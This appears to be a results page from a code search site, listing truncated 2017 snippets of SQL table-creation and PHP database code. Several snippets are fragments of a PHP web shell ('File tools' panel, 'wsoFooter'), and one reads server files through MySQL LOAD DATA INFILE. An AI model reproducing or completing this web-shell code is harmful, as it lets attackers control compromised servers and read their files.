42.7K results in 817 ms
9 years ago · May 10, 2017, 05:38 PM
param string $username Username. If not empty, cancels the cookie
9 years ago · May 10, 2017, 05:38 PM
param string $username Username. If not empty, cancels the cookie
9 years ago · May 10, 2017, 05:36 PM
param string $username Username. If not empty, cancels the cookie
9 years ago · May 10, 2017, 05:34 PM
param string $username Username. If not empty, cancels the cookie
9 years ago · May 10, 2017, 05:32 PM
param string $username Username. If not empty, cancels the cookie
9 years ago · May 10, 2017, 05:22 PM
1 "table PhoneNumbers already exists" 2017-05-10 20:17:59.341719 Ezlogz[2020:552941] DB Query: CREATE TABLE PhoneNumbers(phoneNumber VARCHAR NOT NULL, userId INTEGER NOT
9 years ago · May 10, 2017, 04:44 PM
DATABASE critter; use critter; CREATE TABLE critter ( id INT PRIMARY
9 years ago · May 10, 2017, 12:42 PM
conn->set_charset('utf8'); $sql = "DROP DATABASE IF EXISTS Exam"; $conn->query($sql); $sql = "CREATE DATABASE Exam COLLATE utf8_general_ci";
9 years ago · May 10, 2017, 11:06 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · May 10, 2017, 10:44 AM
if($db){ if(@mysql_select_db($sqldb,$db)){ @mysql_query("DROP TABLE IF EXISTS temp_mysql_readfile_table"); @mysql_query("CREATE TABLE `temp_mysql_readfile_table` ( `file` LONGBLOB NOT NULL )"); @mysql_query("LOAD DATA INFILE
9 years ago · May 10, 2017, 10:38 AM
база $sql = "DROP DATABASE IF EXISTS test"; $conn->query($sql); // Create database test with collation
9 years ago · May 10, 2017, 07:02 AM
are it doesnt ;) mysql_query("CREATE TABLE IF NOT EXISTS ".$table." ( `fieldnumber` int(10) NOT
9 years ago · May 10, 2017, 12:50 AM
TO DATABASE g_SqlTuple = SQL_MakeDbTuple(host,user,pass,db); // CREATE TABLE IF IT DOESNT EXIST format(g_Cache,1023,"CREATE TABLE IF NOT EXISTS `%s` (`steamid` varchar(51) NOT
9 years ago · May 09, 2017, 10:06 AM
var value = owner[ this.expando ]; // If not, create one if ( !value ) { value
9 years ago · May 09, 2017, 09:34 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · May 09, 2017, 09:16 AM
copyquery[500]; + + if(lastupdate <= (current_time-(60*5))) { + if(mysql_query(conn, "CREATE TEMPORARY TABLE IF NOT EXISTS ms_core_temp (`server_readds` int(11) NOT
9 years ago · May 09, 2017, 08:20 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · May 09, 2017, 08:10 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · May 08, 2017, 09:38 PM
structure for table `apis` -- CREATE TABLE IF NOT EXISTS `apis` ( `id` int(11) NOT
9 years ago · May 08, 2017, 02:06 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
Total pages: 2134